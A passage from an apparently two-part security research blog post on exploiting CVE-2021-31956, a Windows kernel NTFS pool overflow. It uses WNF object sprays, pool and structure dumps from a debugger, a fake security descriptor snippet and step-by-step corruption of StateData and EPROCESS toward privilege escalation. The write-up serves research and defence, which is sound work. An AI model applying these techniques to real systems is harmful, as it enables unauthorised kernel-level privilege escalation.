 ffff9a82c1cd4060 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4090 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd40c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd40f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4120 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4150 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4180 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd41b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd41e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4210 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4240 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4270 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd42a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd42d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4300 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4330 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4360 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4390 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd43c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd43f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4420 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4450 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4480 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd44b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd44e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4510 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4540 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4570 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd45a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd45d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4600 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4630 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4660 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4690 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd46c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd46f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4720 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4750 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4780 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd47b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd47e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4810 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4840 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4870 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd48a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd48d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4900 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4930 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4960 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4990 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd49c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd49f0 size:   30 previous size:    0  (Free)       NtFE
*ffff9a82c1cd4a20 size:  220 previous size:    0  (Allocated) *Wnf  Process: ffff8608b72bf080
        Pooltag Wnf  : Windows Notification Facility, Binary : nt!wnf
 ffff9a82c1cd4c30 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4c60 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4c90 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4cc0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4cf0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4d20 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4d50 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4d80 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080

However, the main thing here is the ability to find a more interesting object to corrupt. As a quick win, the PipeAttribute object from the great paper https://www.sstic.org/media/SSTIC2020/SSTIC-actes/pool_overflow_exploitation_since_windows_10_19h1/SSTIC2020-Article-pool_overflow_exploitation_since_windows_10_19h1-bayet_fariello.pdf was also used.

typedef struct pipe_attribute {
    LIST_ENTRY list;
    char* AttributeName;
    size_t ValueSize;
    char* AttributeValue;
    char data[0];
} pipe_attribute_t;

As PipeAttribute chunks are also a controllable size and allocated on the paged pool, it is possible to place one adjacent to either a vulnerable NTFS chunk or a WNF chunk which allows relative write’s.

Using this layout we can corrupt the PipeAttribute‘s Flink pointer and point this back to a fake pipe attribute as described in the paper above. Please refer back to that paper for more detailed information on the technique.

Diagramatically we end up with the following memory layout for the arbitrary read part:

Whilst this worked and provided a nice reliable arbitrary read primitive, the original aim was to explore WNF more to determine how an attacker may have leveraged it.

The journey to arbitrary write

After taking a step back after this minor Pipe Attribute detour and with the realisation that I could actually control the size of the vulnerable NTFS chunks. I started to investigate if it was possible to corrupt the StateData pointer of a _WNF_NAME_INSTANCE structure. Using this, so long as the DataSize and AllocatedSize could be aligned to sane values in the target area in which the overwrite was to occur in, then the bounds checking within the ExpWnfWriteStateData would be successful.

Looking at the creation of the _WNF_NAME_INSTANCE we can see that it will be of size 0xA8 + the POOL_HEADER (0x10), so 0xB8 in size. This ends up being put into a chunk of 0xC0 within the segment pool:

So the aim is to have the following occurring:

We can perform a spray as before using any size of _WNF_STATE_DATA which will lead to a _WNF_NAME_INSTANCE instance being allocated for each _WNF_STATE_DATA created.

Therefore can end up with our desired memory layout with a _WNF_NAME_INSTANCE adjacent to our overflowing NTFS chunk, as follows:

 ffffdd09b35c8010 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c80d0 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8190 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
*ffffdd09b35c8250 size:   c0 previous size:    0  (Allocated) *NtFE
        Pooltag NtFE : Ea.c, Binary : ntfs.sys
 ffffdd09b35c8310 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080       
 ffffdd09b35c83d0 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8490 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8550 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8610 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c86d0 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8790 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8850 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8910 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c89d0 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8a90 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8b50 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8c10 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8cd0 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8d90 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8e50 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8f10 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080

We can see before the corruption the following structure values:

1: kd> dt _WNF_NAME_INSTANCE ffffdd09b35c8310+0x10
nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF
   +0x010 TreeLinks        : _RTL_BALANCED_NODE
   +0x028 StateName        : _WNF_STATE_NAME_STRUCT
   +0x030 ScopeInstance    : 0xffffdd09`ad45d4a0 _WNF_SCOPE_INSTANCE
   +0x038 StateNameInfo    : _WNF_STATE_NAME_REGISTRATION
   +0x050 StateDataLock    : _WNF_LOCK
   +0x058 StateData        : 0xffffdd09`b35b3e10 _WNF_STATE_DATA
   +0x060 CurrentChangeStamp : 1
   +0x068 PermanentDataStore : (null) 
   +0x070 StateSubscriptionListLock : _WNF_LOCK
   +0x078 StateSubscriptionListHead : _LIST_ENTRY [ 0xffffdd09`b35c8398 - 0xffffdd09`b35c8398 ]
   +0x088 TemporaryNameListEntry : _LIST_ENTRY [ 0xffffdd09`b35c8ee8 - 0xffffdd09`b35c85e8 ]
   +0x098 CreatorProcess   : 0xffff8d87`686c8080 _EPROCESS
   +0x0a0 DataSubscribersCount : 0n0
   +0x0a4 CurrentDeliveryCount : 0n0

Then after our NTFS extended attributes overflow has occurred and we have overwritten a number of fields:

1: kd> dt _WNF_NAME_INSTANCE ffffdd09b35c8310+0x10
nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF
   +0x010 TreeLinks        : _RTL_BALANCED_NODE
   +0x028 StateName        : _WNF_STATE_NAME_STRUCT
   +0x030 ScopeInstance    : 0x61616161`62626262 _WNF_SCOPE_INSTANCE
   +0x038 StateNameInfo    : _WNF_STATE_NAME_REGISTRATION
   +0x050 StateDataLock    : _WNF_LOCK
   +0x058 StateData        : 0xffff8d87`686c8088 _WNF_STATE_DATA
   +0x060 CurrentChangeStamp : 1
   +0x068 PermanentDataStore : (null) 
   +0x070 StateSubscriptionListLock : _WNF_LOCK
   +0x078 StateSubscriptionListHead : _LIST_ENTRY [ 0xffffdd09`b35c8398 - 0xffffdd09`b35c8398 ]
   +0x088 TemporaryNameListEntry : _LIST_ENTRY [ 0xffffdd09`b35c8ee8 - 0xffffdd09`b35c85e8 ]
   +0x098 CreatorProcess   : 0xffff8d87`686c8080 _EPROCESS
   +0x0a0 DataSubscribersCount : 0n0
   +0x0a4 CurrentDeliveryCount : 0n0

For example, the StateData pointer has been modified to hold the address of an EPROCESS structure:

1: kd> dx -id 0,0,ffff8d87686c8080 -r1 ((ntkrnlmp!_WNF_STATE_DATA *)0xffff8d87686c8088)
((ntkrnlmp!_WNF_STATE_DATA *)0xffff8d87686c8088)                 : 0xffff8d87686c8088 [Type: _WNF_STATE_DATA *]
    [+0x000] Header           [Type: _WNF_NODE_HEADER]
    [+0x004] AllocatedSize    : 0xffff8d87 [Type: unsigned long]
    [+0x008] DataSize         : 0x686c8088 [Type: unsigned long]
    [+0x00c] ChangeStamp      : 0xffff8d87 [Type: unsigned long]


PROCESS ffff8d87686c8080
    SessionId: 1  Cid: 1760    Peb: 100371000  ParentCid: 1210
    DirBase: 873d5000  ObjectTable: ffffdd09b2999380  HandleCount:  46.
    Image: TestEAOverflow.exe

I also made use of CVE-2021-31955 as a quick way to get hold of an EPROCESS address. At this was used within the in the wild exploit. However, with the primitives and flexibility of this overflow, it is expected that this would likely not be needed and this could also be exploited at low integrity.

There are still some challenges here though, and it is not as simple as just overwriting the StateName with a value which you would like to look up.

StateName Corruption

For a successful StateName lookup, the internal state name needs to match the external name queried from.

At this stage it is worth going into the StateName lookup process in more depth.

As mentioned within Playing with the Windows Notification Facility, each _WNF_NAME_INSTANCE is sorted and put into an AVL tree based on its StateName.

There is the external version of the StateName which is the internal version of the StateName XOR’d with 0x41C64E6DA3BC0074.

For example, the external StateName value 0x41c64e6da36d9945 would become the following internally:

1: kd> dx -id 0,0,ffff8d87686c8080 -r1 (*((ntkrnlmp!_WNF_STATE_NAME_STRUCT *)0xffffdd09b35c8348))
(*((ntkrnlmp!_WNF_STATE_NAME_STRUCT *)0xffffdd09b35c8348))                 [Type: _WNF_STATE_NAME_STRUCT]
    [+0x000 ( 3: 0)] Version          : 0x1 [Type: unsigned __int64]
    [+0x000 ( 5: 4)] NameLifetime     : 0x3 [Type: unsigned __int64]
    [+0x000 ( 9: 6)] DataScope        : 0x4 [Type: unsigned __int64]
    [+0x000 (10:10)] PermanentData    : 0x0 [Type: unsigned __int64]
    [+0x000 (63:11)] Sequence         : 0x1a33 [Type: unsigned __int64]
1: kd> dc 0xffffdd09b35c8348
ffffdd09`b35c8348  00d19931

Or in bitwise operations:

Version = InternalName & 0xf
LifeTime = (InternalName >> 4) & 0x3
DataScope = (InternalName >> 6) & 0xf
IsPermanent = (InternalName >> 0xa) & 0x1
Sequence = InternalName >> 0xb

The key thing to realise here is that whilst Version, LifeTime, DataScope and Sequence are controlled, the Sequence number for WnfTemporaryStateName state names is stored in a global.

As you can see from the below, based on the DataScope the current server Silo Globals or the Server Silo Globals are offset into to obtain v10 and then this used as the Sequence which is incremented by 1 each time.

Then in order to lookup a name instance the following code is taken:

i[3] in this case is actually the StateName of a _WNF_NAME_INSTANCE structure, as this is outside of the _RTL_BALANCED_NODE rooted off the NameSet member of a _WNF_SCOPE_INSTANCE structure.

Each of the _WNF_NAME_INSTANCE are joined together with the TreeLinks element. Therefore the tree traversal code above walks the AVL tree and uses it to find the correct StateName.

One challenge from a memory corruption perspective is that whilst you can determine the external and internal StateName‘s of the objects which have been heap sprayed, you don’t necessarily know which of the objects will be adjacent to the NTFS chunk which is being overflowed.

However, with careful crafting of the pool overflow, we can guess the appropriate value to set the _WNF_NAME_INSTANCE structure’s StateName to be.

It is also possible to construct your own AVL tree by corrupting the TreeLinks pointers, however, the main caveat with that is that care needs to be taken to avoid safe unlinking protection occurring.

As we can see from Windows Mitigations, Microsoft has implemented a significant number of mitigations to make heap and pool exploitation more difficult.

In a future blog post I will discuss in depth how this affects this specific exploit and what clean-up is necessary.

Security Descriptor

One other challenge I ran into whilst developing this exploit was due the security descriptor.

Initially I set this to be the address of a security descriptor within userland, which was used in NtCreateWnfStateName.

Performing some comparisons between an unmodified security descriptor within kernel space and the one in userspace demonstrated that these were different.

Kernel space:

1: kd> dx -id 0,0,ffffce86a715f300 -r1 ((ntkrnlmp!_SECURITY_DESCRIPTOR *)0xffff9e8253eca5a0)
((ntkrnlmp!_SECURITY_DESCRIPTOR *)0xffff9e8253eca5a0)                 : 0xffff9e8253eca5a0 [Type: _SECURITY_DESCRIPTOR *]
    [+0x000] Revision         : 0x1 [Type: unsigned char]
    [+0x001] Sbz1             : 0x0 [Type: unsigned char]
    [+0x002] Control          : 0x800c [Type: unsigned short]
    [+0x008] Owner            : 0x0 [Type: void *]
    [+0x010] Group            : 0x28000200000014 [Type: void *]
    [+0x018] Sacl             : 0x14000000000001 [Type: _ACL *]
    [+0x020] Dacl             : 0x101001f0013 [Type: _ACL *]

After repointing the security descriptor to the userland structure:

1: kd> dx -id 0,0,ffffce86a715f300 -r1 ((ntkrnlmp!_SECURITY_DESCRIPTOR *)0x23ee3ab6ea0)
((ntkrnlmp!_SECURITY_DESCRIPTOR *)0x23ee3ab6ea0)                 : 0x23ee3ab6ea0 [Type: _SECURITY_DESCRIPTOR *]
    [+0x000] Revision         : 0x1 [Type: unsigned char]
    [+0x001] Sbz1             : 0x0 [Type: unsigned char]
    [+0x002] Control          : 0xc [Type: unsigned short]
    [+0x008] Owner            : 0x0 [Type: void *]
    [+0x010] Group            : 0x0 [Type: void *]
    [+0x018] Sacl             : 0x0 [Type: _ACL *]
    [+0x020] Dacl             : 0x23ee3ab4350 [Type: _ACL *]

I then attempted to provide the fake the security descriptor with the same values. This didn’t work as expected and NtUpdateWnfStateData was still returning permission denied (-1073741790).

Ok then! Lets just make the DACL NULL, so that the everyone group has Full Control permissions.

After experimenting some more, patching up a fake security descriptor with the following values worked and the data was successfully written to my arbitrary location:

SECURITY_DESCRIPTOR* sd = (SECURITY_DESCRIPTOR*)malloc(sizeof(SECURITY_DESCRIPTOR));
sd->Revision = 0x1;
sd->Sbz1 = 0;
sd->Control = 0x800c;
sd->Owner = 0;
sd->Group = (PSID)0;
sd->Sacl = (PACL)0;
sd->Dacl = (PACL)0;

EPROCESS Corruption

Initially when testing out the arbitrary write, I was expecting that when I set the StateData pointer to be 0x6161616161616161 a kernel crash near the memcpy location. However, in practice the execution of ExpWnfWriteStateData was found to be performed in a worker thread. When an access violation occurs, this is caught and the NT status -1073741819 which is STATUS_ACCESS_VIOLATION is propagated back to userland. This made initial debugging more challenging, as the code around that function was a significantly hot path and with conditional breakpoints lead to a huge program standstill.

Anyhow, typically after achieving an arbitrary write an attacker will either leverage to perform a data-only based privilege escalation or to achieve arbitrary code execution.

As we are using CVE-2021-31955 for the EPROCESS address leak we continue our research down this path.

To recap, the following steps were needing to be taken:

1) The internal StateName matched up with the correct internal StateName so the correct external StateName can be found when required.
2) The Security Descriptor passing the checks in ExpWnfCheckCallerAccess.
3) The offsets of DataSize and AllocSize being appropriate for the area of memory desired.

So in summary we have the following memory layout after the overflow has occurred and the EPROCESS being treated as a _WNF_STATE_DATA:

We can then demonstrate corrupting the EPROCESS struct:

PROCESS ffff8881dc84e0c0
    SessionId: 1  Cid: 13fc    Peb: c2bb940000  ParentCid: 1184
    DirBase: 4444444444444444  ObjectTable: ffffc7843a65c500  HandleCount:  39.
    Image: TestEAOverflow.exe

PROCESS ffff8881dbfee0c0
    SessionId: 1  Cid: 073c    Peb: f143966000  ParentCid: 13fc
    DirBase: 135d92000  ObjectTable: ffffc7843a65ba40  HandleCount: 186.
    Image: conhost.exe

PROCESS ffff8881dc3560c0
    SessionId: 0  Cid: 0448    Peb: 825b82f000  ParentCid: 028c
    DirBase: 37daf000  ObjectTable: ffffc7843ec49100  HandleCount: 176.
    Image: WmiApSrv.exe

1: kd> dt _WNF_STATE_DATA ffffd68cef97a080+0x8
nt!_WNF_STATE_DATA
   +0x000 Header           : _WNF_NODE_HEADER
   +0x004 AllocatedSize    : 0xffffd68c
   +0x008 DataSize         : 0x100
   +0x00c ChangeStamp      : 2

1: kd> dc ffff8881dc84e0c0 L50
ffff8881`dc84e0c0  00000003 00000000 dc84e0c8 ffff8881  ................
ffff8881`dc84e0d0  00000100 41414142 44444444 44444444  ....BAAADDDDDDDD
ffff8881`dc84e0e0  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e0f0  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e100  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e110  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e120  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e130  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e140  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e150  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e160  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e170  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e180  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e190  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e1a0  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e1b0  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e1c0  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e1d0  44444444 44444444 00000000 00000000  DDDDDDDD........
ffff8881`dc84e1e0  00000000 00000000 00000000 00000000  ................
ffff8881`dc84e1f0  00000000 00000000 00000000 00000000  ................

As you can see, EPROCESS+0x8 has been corrupted with attacker controlled data.

At this point typical approaches would be to either:

1) Target KTHREAD structures PreviousMode member

2) Target the EPROCESS token

These approaches and pros and cons have been discussed previously by EDG team members whilst exploiting a vulnerability in KTM.

The next stage will be discussed within a follow-up blog post as there are still some challenges to face before reliable privilege escalation is achieved.

Summary

In summary we have described more about the vulnerability and how it can be triggered. We have seen how WNF can be leveraged to enable a novel set of exploit primitive. That is all for now in part 1! In the next blog I will cover reliability improvements, kernel memory clean up and continuation.

CVE-2021-31956 Exploiting the Windows Kernel (NTFS with WNF) – Part 2

17 August 2021 at 08:05

Introduction

In part 1 the aim was to cover the following:

  • An overview of the vulnerability assigned CVE-2021-31956 (NTFS Paged Pool Memory corruption) and how to trigger

  • An introduction into the Windows Notification Framework (WNF) from an exploitation perspective

  • Exploit primitives which can be built using WNF

In this article I aim to build on that previous knowledge and cover the following areas:

  • Exploitation without the CVE-2021-31955 information disclosure

  • Enabling better exploit primitives through PreviousMode

  • Reliability, stability and exploit clean-up

  • Thoughts on detection

The version targeted within this blog was Windows 10 20H2 (OS Build 19042.508). However, this approach has been tested on all Windows versions post 19H1 when the segment pool was introduced.

Exploitation without CVE-2021-31955 information disclosure

I hinted in the previous blog post that this vulnerability could likely be exploited without the usage of the separate EPROCESS address leak vulnerability CVE-2021-31955). This was also realised too by Yan ZiShuang and documented within the blog post.

Typically, for Windows local privilege escalation, once an attacker has achieved arbitrary write or kernel code execution then the aim will be to escalate privileges for their associated userland process or pan a privileged command shell. Windows processes have an associated kernel structure called _EPROCESS which acts as the process object for that process. Within this structure, there is a Token member which represents the process’s security context and contains things such as the token privileges, token types, session id etc.

CVE-2021-31955 lead to an information disclosure of the address of the _EPROCESS for each running process on the system and was understood to be used by the in-the-wild attacks found by Kaspersky. However, in practice for exploitation of CVE-2021-31956 this separate vulnerability is not needed.

This is due to the _EPROCESS pointer being contained within the _WNF_NAME_INSTANCE as the CreatorProcess member:

nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF
   +0x010 TreeLinks        : _RTL_BALANCED_NODE
   +0x028 StateName        : _WNF_STATE_NAME_STRUCT
   +0x030 ScopeInstance    : Ptr64 _WNF_SCOPE_INSTANCE
   +0x038 StateNameInfo    : _WNF_STATE_NAME_REGISTRATION
   +0x050 StateDataLock    : _WNF_LOCK
   +0x058 StateData        : Ptr64 _WNF_STATE_DATA
   +0x060 CurrentChangeStamp : Uint4B
   +0x068 PermanentDataStore : Ptr64 Void
   +0x070 StateSubscriptionListLock : _WNF_LOCK
   +0x078 StateSubscriptionListHead : _LIST_ENTRY
   +0x088 TemporaryNameListEntry : _LIST_ENTRY
   +0x098 CreatorProcess   : Ptr64 _EPROCESS
   +0x0a0 DataSubscribersCount : Int4B
   +0x0a4 CurrentDeliveryCount : Int4B

Therefore, provided that it is possible to get a relative read/write primitive using a _WNF_STATE_DATA to be able to read and{write to a subsequent _WNF_NAME_INSTANCE, we can then overwrite the StateData pointer to point at an arbitrary location and also read the CreatorProcess address to obtain the address of the _EPROCESS structure within memory.

The initial pool layout we are aiming is as follows:

The difficulty with this is that due to the low fragmentation heap (LFH) randomisation, it makes reliably achieving this memory layout more difficult and iteration one of this exploit stayed away from the approach until more research was performed into improving the general reliability and reducing the chances of a BSOD.

As an example, under normal scenarios you might end up with the following allocation pattern for a number of sequentially allocated blocks:

In the absense of an LFH "Heap Randomisation" weakness or vulnerability, then this post explains how it is possible to achieve a "reasonably" high level of exploitation success and what necessary cleanups need to occur in order to maintain system stability post exploitation.

Stage 1: The Spray and Overflow

Starting from where we left off in the first article, we need to go back and rework the spray and overflow.

Firstly, our _WNF_NAME_INSTANCE is 0xA8 + the POOL_HEADER (0x10), so 0xB8 in size. As mentioned previously this gets put into a chunk of size 0xC0.

We also need to spray _WNF_STATE_DATA objects of size 0xA0 (which when added with the header 0x10 + the POOL_HEADER (0x10) we also end up with a chunk allocated of 0xC0.

As mentioned within part 1 of the article, since we can control the size of the vulnerable allocation we can also ensure that our overflowing NTFS extended attribute chunk is also allocated within the 0xC0 segment.

However, we cannot deterministically know which object will be adjacent to our vulnerable NTFS chunk (as mentioned above), we cannot take a similar approach of free’ing holes as in the past article and then reusing the resulting holes, as both the _WNF_STATE_DATA and _WNF_NAME_INSTANCE objects are allocated at the same time, and we need both present within the same pool segment.

Therefore, we need to be very careful with the overflow. We make sure that only the following fields are overflowed by 0x10 bytes (and the POOL_HEADER).

In the case of a corrupted _WNF_NAME_INSTANCE, both the Header and RunRef members will be overflowed:

nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF

In the case of a corrupted _WNF_STATE_DATA, the Header, AllocatedSize, DataSize and ChangeTimestamp members will be overflowed:

nt!_WNF_STATE_DATA
   +0x000 Header           : _WNF_NODE_HEADER
   +0x004 AllocatedSize    : Uint4B
   +0x008 DataSize         : Uint4B
   +0x00c ChangeStamp      : Uint4B

As we don’t know if we are going to overflow a _WNF_NAME_INSTANCE or a _WNF_STATE_DATA first, then we can trigger the overflow and check for corruption by loop through querying each _WNF_STATE_DATA using NtQueryWnfStateData.

If we detect corruption, then we know we have identified our _WNF_STATE_DATA object. If not, then we can repeatedly trigger the spray and overflow until we have obtained a _WNF_STATE_DATA object which allows a read/write across the pool subsegment.

There are a few problems with this approach, some which can be addressed and some which there is not a perfect solution for:

  1. We only want to corrupt _WNF_STATE_DATA objects but the pool segment also contains _WNF_NAME_INSTANCE objects due to needing to be the same size. Using only a 0x10 data size overflow and cleaning up afterwards (as described in the Kernel Memory Cleanup section) means that this issue does not cause a problem.

  2. Occasionally our unbounded _WNF_STATA_DATA containing chunk can be allocated within the final block within the pool segment. This means that when querying with NtQueryWnfStateData an unmapped memory read will occur off the end of the page. This rarely happens in practice and increasing the spray size reduces the likelihood of this occurring (see Exploit Testing and Statistics section).

  3. Other operating system functionality may make an allocation within the 0xC0 pool segment and lead to corruption and instability. By performing a large spray size before triggering the overflow, from practical testing, this seems to rarely happen within the test environment.

I think it’s useful to document these challenges with modern memory corruption exploitation techniques where it’s not always possible to gain 100% reliability.

Overall with 1) remediated and 2+3 only occurring very rarely, in lieu of a perfect solution we can move to the next stage.

Stage 2: Locating a _WNF_NAME_INSTANCE and overwriting the StateData pointer

Once we have unbounded our _WNF_STATE_DATA by overflowing the DataSize and AllocatedSize as described above, and within the first blog post, then we can then use the relative read to locate an adjacent _WNF_NAME_INSTANCE.

By scanning through the memory we can locate the pattern "\x03\x09\xa8" which denotes the start of a _WNF_NAME_INSTANCE and from this obtain the interesting member variables.

The CreatorProcess, StateName, StateData, ScopeInstance can be disclosed from the identified target object.

We can then use the relative write to replace the StateData pointer with an arbitrary location which is desired for our read and write primitive. For example, an offset within the _EPROCESS structure based on the address which has been obtained from CreatorProcess.

Care needs to be taken here to ensure that the new location StateData points at overlaps with sane values for the AllocatedSize, DataSize values preceding the data wishing to be read or written.

In this case the aim was to achieve a full arbitrary read and write but without having the constraints of needing to find sane and reliable AllocatedSize and DataSize values prior to the memory which it was desired to write too.

Our overall goal was to target the KTHREAD structure’s PreviousMode member and then make use of make use of the APIs NtReadVirtualMemory and NtWriteVirtualMemory to enable a more flexible arbitrary read and write.

